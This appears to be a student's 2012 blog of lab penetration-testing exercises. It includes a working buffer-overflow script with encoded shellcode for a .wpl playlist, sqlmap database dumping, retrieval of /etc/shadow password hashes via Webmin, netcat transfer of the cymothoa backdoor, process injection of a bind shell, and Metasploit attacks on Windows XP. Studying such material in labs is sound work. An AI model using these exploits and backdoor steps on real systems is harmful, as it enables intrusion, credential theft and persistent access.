Friday, 17 February 2012

OK, this is my last attempt. I tried the exploit using the *.wpl extension, and here is the result.
1. The first picture shows that EIP is filled with the A character.
2. The second picture shows that I got EIP filled with DEADBEEF. I got this after filling the stack with 43500 characters of junk.

3. I used shlwapi.dll to find the JMP ESP instruction.
4. And here is my script:
# Builds try.wpl: junk up to the saved return address, then the JMP ESP
# address, a NOP sled and the shellcode. Python 3 form of the script
# (bytes literals, binary file mode); the buffer layout is unchanged.
jnk = b"\x43" * 43500                 # junk up to EIP; the offset found was 43500
# jnk += b"\xEF\xBE\xAD\xDE"          # 0xDEADBEEF, the test value used to confirm control of EIP
jnk += b"\x27\xB2\xFA\x77"            # 0x77FAB227 in little-endian: JMP ESP in shlwapi.dll
# jnk += b"\x41" * 16
jnk += b"\x90" * 32                   # NOP sled; ESP points here after the JMP ESP

# Encoded shellcode: the first bytes are an fnstenv/XOR decoder stub, the rest
# is the payload it decodes at run time.
jnk += (b"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3f"
        b"\x20\xd3\x4e\x83\xeb\xfc\xe2\xf4\xc3\xc8\x97\x4e\x3f\x20\x58\x0b"
        b"\x03\xab\xaf\x4b\x47\x21\x3c\xc5\x70\x38\x58\x11\x1f\x21\x38\x07"
        b"\xb4\x14\x58\x4f\xd1\x11\x13\xd7\x93\xa4\x13\x3a\x38\xe1\x19\x43"
        b"\x3e\xe2\x38\xba\x04\x74\xf7\x4a\x4a\xc5\x58\x11\x1b\x21\x38\x28"
        b"\xb4\x2c\x98\xc5\x60\x3c\xd2\xa5\xb4\x3c\x58\x4f\xd4\xa9\x8f\x6a"
        b"\x3b\xe3\xe2\x8e\x5b\xab\x93\x7e\xba\xe0\xab\x42\xb4\x60\xdf\xc5"
        b"\x4f\x3c\x7e\xc5\x57\x28\x38\x47\xb4\xa0\x63\x4e\x3f\x20\x58\x26"
        b"\x03\x7f\xe2\xb8\x5f\x76\x5a\xb6\xbc\xe0\xa8\x1e\x57\x5e\x0b\xac"
        b"\x4c\x48\x4b\xb0\xb5\x2e\x84\xb1\xd8\x43\xb2\x22\x5c\x0e\xb6\x36"
        b"\x5a\x20\xd3\x4e")

ex = jnk
with open("try.wpl", "wb") as f:      # binary mode so the bytes are written unchanged
    f.write(ex)
# The JMP ESP address is at 77FAB227; reversed (little-endian) it becomes "\x27\xB2\xFA\x77". Found in shlwapi.dll.
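The three steps above (crash with a pattern, read EIP, find the offset, then put the JMP ESP address there) can be automated instead of counting junk by hand. The following is an added example written for this page, not the post's own script: it generates a de Bruijn cyclic pattern (the construction pwntools' cyclic() uses, and the same idea as Metasploit's pattern_create/pattern_offset), so the value read from EIP maps to exactly one offset; packs the shlwapi.dll address little-endian with struct; and checks the finished buffer for bad characters. The crash is simulated, the 44000-byte pattern length and the bad-character list are assumptions, and the 4-byte int3 shellcode is a placeholder for a real payload.

```python
#!/usr/bin/env python3
"""Cyclic-pattern offset finding and exploit-file layout for the *.wpl crash."""
import struct

JMP_ESP = 0x77FAB227            # JMP ESP in shlwapi.dll, the address used in the post
BAD_CHARS = b"\x00\x0a\x0d"     # assumed bad characters for a text-based playlist parser
CRASH_LEN = 44000               # assumed: a little more than the 43500 bytes that reached EIP


def de_bruijn(alphabet, n):
    """de Bruijn sequence B(k, n): every n-byte window occurs exactly once (the
    construction pwntools' cyclic() uses), so the 4 bytes in EIP map to one offset."""
    k = len(alphabet)
    a = [0] * (k * n)
    seq = []

    def db(t, p):
        if t > n:
            if n % p == 0:
                seq.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(alphabet[i] for i in seq)


def cyclic(length, alphabet=b"abcdefghijklmnopqrstuvwxyz"):
    """First `length` bytes of B(26, 4); about 457 KB are available before it repeats."""
    return de_bruijn(alphabet, 4)[:length]


def pack_addr(addr):
    """x86 is little-endian: 0x77FAB227 is stored in memory as 27 B2 FA 77."""
    return struct.pack("<I", addr)


def find_offset(pattern, eip_value):
    """Offset of the 4 pattern bytes that landed in EIP (the debugger shows EIP
    as an integer, so pack it back into the byte order it had in memory)."""
    return pattern.find(pack_addr(eip_value))


def build_exploit(offset, ret_addr, shellcode, nop_count=32, filler=b"C"):
    """Layout used by the post: filler | JMP ESP address | NOP sled | shellcode."""
    buf = filler * offset + pack_addr(ret_addr) + b"\x90" * nop_count + shellcode
    found = sorted({b for b in BAD_CHARS if b in buf})
    if found:
        raise ValueError("bad characters in buffer: " + ", ".join(hex(b) for b in found))
    return buf


def simulated_crash(pattern, offset):
    """Stand-in for the debugger: the value EIP would hold if the saved return
    address sits `offset` bytes into the buffer (constructed, no real crash)."""
    return struct.unpack("<I", pattern[offset:offset + 4])[0]


if __name__ == "__main__":
    pat = cyclic(CRASH_LEN)
    eip = simulated_crash(pat, 43500)       # mirrors the post's 43500-byte offset
    off = find_offset(pat, eip)
    print("EIP=0x%08x -> offset %d" % (eip, off))
    placeholder = b"\xcc" * 4               # int3 x4: a breakpoint instead of a real payload
    with open("try.wpl", "wb") as f:
        f.write(build_exploit(off, JMP_ESP, placeholder))
```

In a real run the pattern goes into the .wpl file, the player is started under the debugger, and the EIP value it shows is what gets passed to find_offset; the bad-character check is the step most often skipped and the usual reason a shellcode that "should work" never runs.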

Friday, 10 February 2012

warFTP

While writing this I have influenza. Finally I must say that I failed at it. I successfully installed WarFTP, but I failed to configure it so that it could connect to my BackTrack. OK, let's see my trouble.
First I want to show that the connection is fine; it can be seen from the ping result.
Next I will show the WarFTP config.
From the picture above we know that WarFTP is properly set...
But my problem comes when I start to connect using nc.
I tried to make the exploit, and I read the book many times, but I still don't understand and still have too many questions; maybe it is because I really don't know Python. I need help.... And my physical condition is not too good. Sorry, I tried hard.

how to use sqlmap

what is sqlmap
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
how to use it
The first thing we must do before using this tool is make sure the web application is vulnerable to SQL injection. For example, take http://192.168.0.21/data/get_int.php?id=1: if we append a single quote to the end of the URL and the page shows a database error, that is a sign we can use sqlmap. In class we know that DVWA has a SQL injection vulnerability, so we just type the following:
root@bt:/pentest/database/sqlmap# ./sqlmap.py  -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" --dbs
The --cookie option carries the DVWA session (PHPSESSID) and the security level; without a logged-in session sqlmap would only see the login page. The command above lists the databases on the server:
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net
[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
[*] starting at: 21:53:15
[21:53:15] [INFO] using '/pentest/database/sqlmap/output/localhost/session' as session file
[21:53:15] [INFO] testing connection to the target url
[21:53:15] [INFO] heuristics detected web page charset 'ascii'
[21:53:16] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[21:53:16] [INFO] testing if the url is stable, wait a few seconds
[21:53:17] [INFO] url is stable
[21:53:17] [INFO] testing if GET parameter 'id' is dynamic
[21:53:17] [INFO] confirming that GET parameter 'id' is dynamic
[21:53:17] [INFO] GET parameter 'id' is dynamic
[21:53:17] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[21:53:17] [INFO] testing sql injection on GET parameter 'id'
[21:53:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:53:17] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:53:17] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:53:17] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[21:53:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:53:24] [INFO] target url appears to be UNION injectable with 2 columns
[21:53:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others? [y/N] y
[21:53:28] [INFO] testing if GET parameter 'Submit' is dynamic
[21:53:28] [WARNING] GET parameter 'Submit' appears to be not dynamic
[21:53:28] [INFO] heuristic test shows that GET parameter 'Submit' might be injectable (possible DBMS: MySQL)
[21:53:28] [INFO] testing sql injection on GET parameter 'Submit'
[21:53:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:53:29] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[21:53:29] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[21:53:29] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[21:53:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[21:53:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[21:53:30] [WARNING] GET parameter 'Submit' is not injectable
sqlmap identified the following injection points with a total of 149 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,101,121,58),CHAR(84,105,69,117,65,89,80,116,111,103),CHAR(58,99,116,99,58))# &Submit=Submit
---
[21:53:30] [INFO] manual usage of GET payloads requires url encoding
[21:53:30] [INFO] testing MySQL
[21:53:30] [INFO] confirming MySQL
[21:53:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[21:53:30] [INFO] fetching database names
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql
[21:53:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
[*] shutting down at: 21:53:30


At the end we see the databases available on the server: there are 4. To dump one of them, for example mysql, add -D with the database name and --dump (the mysql database holds the DBMS accounts and their password hashes in its user table):
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id='&Submit=Submit" --cookie="security=low; Xplico=6pkfig990001f3sqqmmjcr5im7; PHPSESSID=ao6gfq0ou4bafia7vphn6qfvl0" -D mysql --dump
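To see what the payload sqlmap reported actually does, here is an added example (not part of the original post and not sqlmap's own code) that replays it against a constructed DVWA-like users table in SQLite. The CHAR() lists decode to the random delimiters sqlmap wraps around the data it fetches so it can find them in the page; the UNION adds a row to the two-column result of the page's own query (which is why sqlmap said "UNION injectable with 2 columns"); and the same lookup with a bound parameter returns nothing. CONCAT, CHAR and the trailing # comment are MySQL syntax, so the payload is translated to SQLite's ||, char() and -- before it runs. The table rows are made up.

```python
#!/usr/bin/env python3
"""Replay of the UNION payload sqlmap found, against a DVWA-like table in SQLite."""
import re
import sqlite3

# Payload exactly as sqlmap printed it (MySQL syntax).
SQLMAP_PAYLOAD = ("' UNION ALL SELECT NULL, CONCAT(CHAR(58,116,101,121,58),"
                  "CHAR(84,105,69,117,65,89,80,116,111,103),CHAR(58,99,116,99,58))# ")


def decode_char_calls(payload):
    """Turn every CHAR(n,n,...) in the payload into the text it produces.
    sqlmap builds strings from CHAR() so it needs no quotes, and brackets the
    data it wants between random delimiters (here :tey: and :ctc:)."""
    return "".join("".join(chr(int(n)) for n in group.split(","))
                   for group in re.findall(r"CHAR\(([\d,]+)\)", payload))


def to_sqlite(payload):
    """MySQL -> SQLite: CONCAT(a,b,c) becomes a||b||c, CHAR() becomes char(),
    and the '#' line comment becomes '-- '."""
    inner = re.search(r"CONCAT\((.*)\)#", payload).group(1)
    parts = re.findall(r"CHAR\([\d,]+\)", inner)
    concat = "||".join(p.replace("CHAR", "char") for p in parts)
    return "' UNION ALL SELECT NULL, " + concat + "-- "


def make_db():
    """Constructed stand-in for dvwa.users (two text columns are selected)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(user_id INTEGER, first_name TEXT, last_name TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "admin"), (2, "Gordon", "Brown")])
    return con


def vulnerable_lookup(con, user_id):
    """DVWA 'security=low' style: the id parameter is spliced into the SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return con.execute(sql).fetchall()


def safe_lookup(con, user_id):
    """Same query with a bound parameter: the payload is only a value to compare."""
    return con.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                       (user_id,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print("delimiters+data:", decode_char_calls(SQLMAP_PAYLOAD))
    print("vulnerable    :", vulnerable_lookup(con, to_sqlite(SQLMAP_PAYLOAD)))
    print("parameterised :", safe_lookup(con, to_sqlite(SQLMAP_PAYLOAD)))
```

The vulnerable lookup returns a row whose second column is the delimited string, which is exactly what sqlmap looks for in the HTTP response; with the parameterised query the whole payload is compared against user_id as a value and matches nothing.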

Thursday, 9 February 2012

privilege escalation

The basic order of steps we must follow when attacking is:

  1. Information Gathering
  2. Service Enumeration
  3. Vulnerability Assessment
  4. Exploit
On Saturday, 4 February 2012 we had the task of doing privilege escalation on the computer 192.168.0.21. The most important constraint: we only had 10 minutes.
The first step is information gathering. Use nmap to find out which services are running on the target.
root@bt:~# nmap -sV 192.168.0.21
Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-04 18:06 WIT
Nmap scan report for 192.168.0.21
Host is up (0.0016s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.51 seconds
From the output above, port 10000 stands out, with the clue Webmin httpd (MiniServ 0.01). With that information we go straight to Metasploit to look for a module we can use.
msf > search webmin
Matching Modules
================
   Name                                    Disclosure Date  Rank    Description
   ----                                    ---------------  ----    -----------
   auxiliary/admin/webmin/file_disclosure  2006-06-30       normal  Webmin file disclosure
msf > use auxiliary/admin/webmin/file_disclosure 
msf  auxiliary(file_disclosure) > set rhost 192.168.0.21
rhost => 192.168.0.21
msf  auxiliary(file_disclosure) > exploit
[*] Attempting to retrieve /etc/passwd...
[*] The server returned: 200 Document follows
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Hmm... something is wrong, why don't the passwords appear? They never will from this file: /etc/passwd only holds an x in the password field, the hashes are in /etc/shadow. (The ls above also ran on our own BackTrack box: msfconsole passes commands it does not know to the local shell, so the listing is our home directory, not the target's.) Let's check the module options by typing show options:
msf  auxiliary(file_disclosure) > show options

Module options (auxiliary/admin/webmin/file_disclosure):

   Name     Current Setting   Required  Description
   ----     ---------------   --------  -----------
   DIR      /unauthenticated  yes       Webmin directory path
   Proxies                    no        Use a proxy chain
   RHOST    192.168.0.21      yes       The target address
   RPATH    /etc/passwd       yes       The file to download
   RPORT    10000             yes       The target port
   VHOST                      no        HTTP server virtual host

msf  auxiliary(file_disclosure) > set rpath /etc/shadow/
rpath => /etc/shadow/
msf  auxiliary(file_disclosure) > exploit

[*] Attempting to retrieve /etc/shadow/...
[*] The server returned: 200 Document follows
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
bin:*:14040:0:99999:7:::
sys:*:14040:0:99999:7:::
sync:*:14040:0:99999:7:::
games:*:14040:0:99999:7:::
man:*:14040:0:99999:7:::
lp:*:14040:0:99999:7:::
mail:*:14040:0:99999:7:::
news:*:14040:0:99999:7:::
uucp:*:14040:0:99999:7:::
proxy:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
backup:*:14040:0:99999:7:::
list:*:14040:0:99999:7:::
irc:*:14040:0:99999:7:::
gnats:*:14040:0:99999:7:::
nobody:*:14040:0:99999:7:::
dhcp:!:14040:0:99999:7:::
syslog:!:14040:0:99999:7:::
klog:!:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
[*] Auxiliary module execution completed
msf  auxiliary(file_disclosure) > ls
[*] exec: ls

0bf3a6a5724cf0b0499ca7e73ac252ae.rtf
404606_2784683289646_1035152752_32311634_134946266_n.jpg
builder32-2
c16547b957eb2413ec509c66343cd7cb.rtf
Desktop
ed3691697b313fbb1bdf495b7fb1c9a3.rtf
meterpreter.pdf
VirtualBox VMs
Bingo! We have the usernames and their password hashes (root, obama, etc.). The $1$ prefix means MD5-crypt, so these still have to be cracked offline (for example with john) before they can be used to log in. That's all, done.
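The two files come back as raw text, and the hashes still have to be cracked. The following is an added example, not the post's output or a Metasploit module: it joins the two dumps the way john's unshadow does, reads the $1$ prefix as MD5-crypt, and drops locked accounts (* or !) and accounts without an interactive shell, which is the short list worth spending cracking time on. The sample lines are a subset copied from the output above; the hash-type table is the usual crypt(3) prefixes.

```python
#!/usr/bin/env python3
"""Join /etc/passwd and /etc/shadow dumps (unshadow format) and list crackable accounts."""

# Subset of the lines retrieved above (sample data, not fetched from any host).
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
"""

SHADOW = """\
root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::
daemon:*:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
sshd:!:14040:0:99999:7:::
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
"""

# crypt(3) hash prefixes; $1$ (MD5-crypt) is what this 2007-era Ubuntu used.
HASH_TYPES = {"$1$": "md5crypt", "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}


def parse_passwd(text):
    """name -> fields; the second field is always 'x' on a shadowed system."""
    users = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":")
        users[name] = {"uid": int(uid), "gid": gid, "gecos": gecos, "home": home, "shell": shell}
    return users


def parse_shadow(text):
    """name -> hash field (the second colon-separated field)."""
    hashes = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        name, pw_hash = line.split(":")[:2]
        hashes[name] = pw_hash
    return hashes


def hash_type(pw_hash):
    """'locked' for * / ! / empty (nothing to crack), else the crypt scheme."""
    if pw_hash in ("*", "!", "!!", ""):
        return "locked"
    for prefix, kind in HASH_TYPES.items():
        if pw_hash.startswith(prefix):
            return kind
    return "unknown"


def unshadow(passwd_text, shadow_text):
    """Same output as `unshadow passwd shadow`: passwd lines with the x replaced by the hash."""
    users, hashes = parse_passwd(passwd_text), parse_shadow(shadow_text)
    lines = []
    for name, u in users.items():
        pw = hashes.get(name, "x")
        lines.append(":".join([name, pw, str(u["uid"]), u["gid"], u["gecos"], u["home"], u["shell"]]))
    return "\n".join(lines)


def crackable(passwd_text, shadow_text):
    """(name, uid, scheme) for accounts with a real hash and an interactive shell."""
    users, hashes = parse_passwd(passwd_text), parse_shadow(shadow_text)
    out = []
    for name, u in users.items():
        kind = hash_type(hashes.get(name, ""))
        if kind != "locked" and u["shell"] not in NOLOGIN_SHELLS:
            out.append((name, u["uid"], kind))
    return out


if __name__ == "__main__":
    print(unshadow(PASSWD, SHADOW))
    for name, uid, kind in crackable(PASSWD, SHADOW):
        print("%-8s uid=%-5d %s" % (name, uid, kind))
```

The joined text is what john expects as input; root and the three interactive users are the only hashes worth the time, and MD5-crypt is cheap enough that a wordlist attack on them finishes in minutes on a laptop.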
 

how to use cymothoa

In the post before this I explained what cymothoa is, so it is time to write about how to use it. Typing cymothoa with no arguments prints a lot of help. First type
>cymothoa -S
This lists the shellcodes (injection payloads) we can choose from.
To inject into a process we need its process ID (PID). To find the PID just type
>ps -ax
That command prints the list of processes running on the system.



Once we know the PID we can start the injection by typing
 >cymothoa -p 1140 -s 0 -y 9000
This means: inject shellcode number 0 into the process with PID 1140, listening on port 9000.

We see that the infection is done. When we check the process list there are now two processes with the same name.
To make sure the injection worked we can scan with nmap:
port 9000 is open; the service name nmap prints next to it is only its default label for that port, not the injected shell.

Wednesday, 8 February 2012

how to backdoor using nc

The next task is about nc (netcat), not "net cut". First, what is nc?
Netcat is a computer networking utility for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of connection you would need and has a number of built-in capabilities.
It is a useful tool that can listen on a port, connect to one, and so on.
It is usually included in Linux distributions, but when we practised in class we found that nc did not exist on the Ubuntu system. The solution: copy the nc.traditional binary from BT5 and put it in the /bin/ directory of the Ubuntu machine.
After nc is copied into the Ubuntu system we can run it with the command

root@ubuntu-VirtualBox:/bin# ./nc.traditional -l -p 9000
The command above runs nc listening on port 9000. On our host we connect with
nc 192.168.43.129 9000
To check that the connection works, type anything in one console and it shows up on the other side, as in the picture below:

From the picture above we can see that anything we type appears on the other host (the guest). The picture shows that we are connected with nc. Once connected, the next step is to send cymothoa to the guest. Before doing that, what is cymothoa?
Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. It uses the ptrace library (available on nearly all *nix) to manipulate processes and infect them.
Back to the main point: to send cymothoa to the Ubuntu system we use a command like the one below, run from the cymothoa directory /pentest/backdoors/cymothoa/ on BT5:
nc 192.168.43.129 9000 < cymothoa
On the receiving (Ubuntu) side the listener must redirect its output to a file, so it is started as
./nc.traditional -l -p 9000 > cymothoa
If all goes well a file named cymothoa is created in the listener's working directory. Give it execute permission (chmod +x is enough; chmod 777 as we did in class also works but makes it world-writable), then test that it works with
./cymothoa
If everything went fine it will look like the picture below.
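The two nc commands above are nothing more than a TCP listener and a client with stdin/stdout redirected. Here is an added example (not from the post, and not nc itself) that does the same push over the loopback interface with Python sockets and then compares a SHA-256 of what was sent and what arrived, a check nc never does. The payload is constructed bytes standing in for the cymothoa binary, and the listener binds port 0 so the OS picks a free port instead of the post's 9000.

```python
#!/usr/bin/env python3
"""The nc file push (listener: nc -l -p 9000 > file; sender: nc host 9000 < file)
done with raw sockets on loopback, plus an integrity check."""
import hashlib
import socket
import threading

PAYLOAD = bytes(range(256)) * 64        # constructed 16 KB 'binary' standing in for cymothoa


def push_file(host, port, data):
    """Sender side, like `nc host 9000 < file`: write everything, then close the
    write half so the listener sees EOF and exits (what nc's -q option controls)."""
    with socket.create_connection((host, port)) as s:
        s.sendall(data)
        s.shutdown(socket.SHUT_WR)


def receive_file(srv):
    """Listener side, like `nc -l -p 9000 > file`: accept ONE client and read until
    EOF. Whoever connects first gets to write the file; nc has no authentication."""
    conn, _peer = srv.accept()
    chunks = []
    with conn:
        while True:
            data = conn.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def transfer_loopback(data):
    """Run listener and sender in one process; returns (received_bytes, digests_match)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))          # port 0: OS-assigned free port (the post used 9000)
    srv.listen(1)
    port = srv.getsockname()[1]
    sender = threading.Thread(target=push_file, args=("127.0.0.1", port, data))
    sender.start()
    try:
        received = receive_file(srv)
    finally:
        sender.join()
        srv.close()
    # Same check as running sha256sum on both hosts before chmod'ing and executing the file.
    ok = hashlib.sha256(received).hexdigest() == hashlib.sha256(data).hexdigest()
    return received, ok


if __name__ == "__main__":
    got, ok = transfer_loopback(PAYLOAD)
    print("received %d bytes, integrity %s" % (len(got), "OK" if ok else "MISMATCH"))
```

Two things the code makes explicit that the nc one-liners hide: the sender has to close its write side or the listener never reaches EOF and hangs, and the listener takes the first connection it gets, so on a shared lab network the file you chmod and run is not guaranteed to be the one you sent unless you compare digests.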

Thursday, 2 February 2012

Exploit The XP SP3


Of all the tasks I got, I think this is the most difficult: exploit Windows XP SP3. I had no idea how to start. In class the assistant did not explain what to do; he only said use Nessus to gather information and catch something vulnerable, and then use exploit-db.

OK, straight to the point. To start Nessus: as we know, Nessus runs on port 8834, so just type https://localhost:8834 in the address bar, wait a while and log in with the username and password we entered before.
After we enter the right username and password we reach the Nessus page shown in the picture below.
On that page choose Scan to create a new scan, and press the Add button.
Enter the name of the scan, the type, the target, etc. as in the picture below, and click Launch Scan.
After we press Launch Scan the scan begins; wait until it is done.
The scan found six High results that we may be able to exploit. To see the details just double-click one, and Nessus tells us the details.
Clicking it shows details like the picture below.
Using Nessus is done. It's time to use Metasploit or exploit-db. Honestly, until now I had too many questions about how to use the exploit. How... how... and how? I asked Google for help but did not get the right answer.

OMG, Alhamdulillahi rabbil alamin... praise God, thank God, masha Allah, at last I understand how to use it... It is now 21:11 on 2 February 2012. I know... I know... I know...

After going round and round and searching, at last I understand. OK, not too much talk, let's go straight to the case. We found MS09-001; just search for it in Metasploit.

Eh... before doing that we must first enter Metasploit by typing msfconsole.
In the Metasploit console type search ms09-001; remember that MS09-001 is the clue we got from the Nessus scan. OK, not too much talk, see the details in the picture below.
From the picture above we know that a module was found. Well... this is the big question I finally cracked: how do we use this exploit? It's simple, just type
use auxiliary/dos/windows/smb/ms09_001_write
The next step is to set the target with set rhost 192.168.43.128 (remember that our target is 192.168.43.128) and press enter. The next step is to type exploit.
Bingo! And what is the result? The Windows XP SP3 machine in VirtualBox restarts (this module is a denial of service, as the auxiliary/dos path says, not a shell). It is difficult to prove in the blog, but the picture below can represent it.


I want to try another bug. We found six bugs, right :D :D :D The next bug is MS08_067.


Oh my god, I found something new on it. I found meterpreter and I don't know what to do with it.
Whooooooooooohohohohohohoho.... What have I found??

I tried the ls command and I got all the directories on the Windows machine. Nice, it is very nice..... Thanks to God...

That is all my experience tonight. This is not the end but the beginning. It is my first experience and will be my best experience. I'll never forget how happy I am. I always say Alhamdulillahi rabbil alamin... praise be to my Lord Allah SWT, Lord of all the worlds...